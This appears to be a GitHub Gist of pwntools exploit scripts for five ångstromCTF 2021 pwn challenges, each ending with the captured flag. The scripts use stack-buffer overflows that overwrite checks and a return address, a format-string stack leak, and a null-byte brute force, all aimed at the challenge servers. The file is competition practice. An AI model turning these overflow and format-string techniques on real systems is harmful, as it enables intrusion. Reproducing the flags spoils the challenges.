Last active
April 8, 2021 14:12
-
-
Save blackbeard666/f176e4d8b22e6a38886a3541605afbf0 to your computer and use it in GitHub Desktop.
ANGSTROM 21 PWN SCRIPTS (solved the four easy ones, saving the other challs I worked on but were solved by the other pwn guys from ARESx here)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#: CONNECT TO CHALLENGE SERVERS | |
binary = ELF('./raiid_shadow_legends', checksec = False) | |
#libc = ELF('./libc.so.6', checksec = False) | |
#p = process('./raiid_shadow_legends') | |
#p = process('./raiid_shadow_legends', env = {'LD_PRELOAD' : libc.path}) | |
p = remote("shell.actf.co", 21300) | |
#: GDB SETTINGS | |
breakpoints = ['break *play', 'break *terms_and_conditions', 'break *play + 493', 'break *play + 178'] | |
#gdb.attach(p, gdbscript = '\n'.join(breakpoints)) | |
#: EXPLOIT INTERACTION STUFF | |
def game_choice(choice): | |
print(p.recvuntil(b'do? ')) | |
p.sendline(str(choice)) | |
def send_condition(agreement): | |
p.sendlineafter(b'conditions? ', agreement) | |
def send_signature(sign): | |
p.sendlineafter(b'here: ', sign) | |
def send_name(name): | |
p.sendlineafter(b'name: ', name) | |
#: PWN THY VULNS | |
game_choice(1) | |
send_condition(cyclic(4) + p64(1337)) | |
send_condition('yes') | |
send_signature('SIGNATURE') | |
send_name('_blackb3ard') | |
game_choice(2) | |
p.interactive() | |
#: actf{great_job!_speaking_of_great_jobs,_our_sponsor_audible...} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#: CONNECT TO CHALLENGE SERVERS | |
binary = ELF('./checks', checksec = False) | |
#libc = ELF('./libc.so.6', checksec = False) | |
#p = process('./checks') | |
#p = process('./checks', env = {'LD_PRELOAD' : libc.path}) | |
p = remote("shell.actf.co", 21303) | |
#: GDB SETTINGS | |
breakpoints = ['break *main + 159'] | |
#gdb.attach(p, gdbscript = '\n'.join(breakpoints)) | |
#: EXPLOIT INTERACTION STUFF | |
#: PWN THY VULNS | |
exploit = b"password123\x00" | |
exploit += cyclic(80 - (2 * 8)) | |
exploit += p32(17) | |
exploit += p32(61) | |
exploit += p32(245) | |
exploit += p32(55) | |
exploit += p32(50) | |
p.sendline(exploit) | |
p.interactive() | |
#: Challenge summary: control values in the stack to pass checks | |
#: actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#: CONNECT TO CHALLENGE SERVERS | |
binary = ELF('./login', checksec = False) | |
#libc = ELF('./libc.so.6', checksec = False) | |
#: PWN THY VULNS | |
context.log_level = 'error' | |
for i in range(1000): | |
p = process('./login') | |
p.sendline('\x00') | |
print(i, p.recvall()) | |
p.close() | |
#: actf{if_youre_reading_this_ive_been_hacked} | |
#: JUST BRUTEFORCE AND SEND NULL BYTE TO THE SHELL SERVER | |
#: https://ctftime.org/writeup/24905 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from Crypto.Util.number import long_to_bytes, bytes_to_long | |
#: CONNECT TO CHALLENGE SERVERS | |
binary = ELF('./stickystacks', checksec = False) | |
#libc = ELF('./libc.so.6', checksec = False) | |
#: GDB SETTINGS | |
breakpoints = ['break *vuln + 527'] | |
#gdb.attach(p, gdbscript = '\n'.join(breakpoints)) | |
#: EXPLOIT INTERACTION STUFF | |
context.log_level = 'error' | |
#: PWN THY VULNS | |
flag = b'' | |
for i in range(33, 42): | |
p = remote("shell.actf.co", 21820) | |
p.sendline(f"%{i}$p") | |
tmp = p.recvall().split(b'Welcome, ')[1].strip() | |
flag += bytes.fromhex(hex(int(tmp.decode(), 16))[2:])[::-1] | |
p.close() | |
#: offset 42, which for some reason I can't parse properly | |
#: i'm too lazy to do it | |
flag += bytes.fromhex("7d333935663161")[::-1] | |
print(flag) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#: CONNECT TO CHALLENGE SERVERS | |
binary = ELF('./tranquil', checksec = False) | |
#libc = ELF('./libc.so.6', checksec = False) | |
#p = process('./tranquil') | |
#p = process('./tranquil', env = {'LD_PRELOAD' : libc.path}) | |
p = remote("shell.actf.co", 21830) | |
print(p.recvuntil(b'word: ')) | |
#: GDB SETTINGS | |
breakpoints = ['break *vuln + 92'] | |
#gdb.attach(p, gdbscript = '\n'.join(breakpoints)) | |
#: EXPLOIT INTERACTION STUFF | |
#: PWN THY VULNS | |
p.sendline(b"password123\x00" + cyclic(60) + p64(0x401196)) | |
p.interactive() | |
#: actf{time_has_gone_so_fast_watching_the_leaves_fall_from_our_instruction_pointer_864f647975d259d7a5bee6e1} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment